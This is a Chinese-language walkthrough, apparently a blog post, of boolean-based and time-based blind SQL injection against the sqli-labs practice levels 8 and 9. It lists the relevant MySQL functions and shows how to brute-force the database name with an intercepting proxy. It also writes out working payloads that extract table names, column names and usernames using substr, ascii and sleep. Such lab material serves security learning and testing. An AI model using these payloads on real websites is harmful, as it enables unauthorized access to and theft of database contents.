布尔盲注在注入时无回显的情况下适用,有关盲注涉及到的函数如下:
length() | 返回字符串长度 |
substr(a,b,c) | 从字符串a中b位截取c个字符 |
ascii() | 将字符逐个转为ascii码 ascii码共128个 |
left(a,b) | 从左侧截取前b位 |
regexp '^ro' | 正则表达式,此句表示前两位为ro;与 like 'ro%' 作用一样 |
ord() | 返回字符串第一个字符的ascii码 |
mid(1,2,3) | 与substr()用法一样,从字符串a中b位截取c个字符 |
布尔盲注实例sqli-labs-less-8
本关为布尔盲注,尝试payload
可以看到and 1=1时回显正常,1=2时没有回显任何信息也没有报错,可确定为盲注。接下来进行猜数据库长度
可以看到大于7时正常,大于8时无回显,说明数据库长度为8,然后就可以进行爆数据库了?id=1' and ascii(substr(database(),1,1))>0 --+ 通过转化为ascii码值来确定数据库名,这里我选择抓包进行fuzz
抓包后先点击clear清除变量,再选择所需要进行爆破的数据add添加为变量
第一个变量为数据库的位数,这里数据库长度为8所以选择到8就可以了
第二个变量就是数据库每个字母所对应的ascii码值,所以选到127就够了,然后就可以开始进行爆破了
完成之后按长度进行筛选 就可以发现8个数据的长度不一样,刚刚好就是数据库名称,对照ascii码表,可确定数据库名称为security。接下来的爆表名,字段名以及字段内容都是以相同的操作进行。这里就不一一展示了
基于时间的盲注
基于时间的盲注,跟布尔型的盲注不同,无论输入什么回显的信息让我们无法根据正确或者错误来判断,但它有另外一种方式,那就是页面返回的时间,我们可以根据这个时间来判断真假。比如:正确的话会导致时间很长,错误的话会导致执行时间很短。
基于时间的盲注的两个重要函数:
时间盲注的实例:sqli-labs-less-9
本关的题目介绍说的就是单引号注入,注入点与注入类型的判断在此跳过
获取数据库长度id=1’ and sleep(3) and length(substr(database(),m,10))>n --+
(判断长度时substr(a,b,c)中的c应大于数据库长度,所以尽可能的取大点的数,不然就会判断出错)
我们先进行对比一下
依次尝试了数据库长度为>6,>7,>8的时候,发现6和7的时候反应时间都是3s,而8的时候反应时间则是一瞬间,说明此时大于8不成立了,此时可以说明数据库长度为8。
接下来的思路同上,就不一一展示了。
爆数据库
id =1' and sleep(3) and ascii(substr(database(),m,1))>n --+
爆表 id =1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit a,1),m,1))>n and sleep(3) --+
爆字段 id =1' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit a,1),m,1))>n and sleep(3) --+
爆字段内容 id =1' and ascii(substr((select username from security.users limit a,1),m,1))>n and sleep(3) --+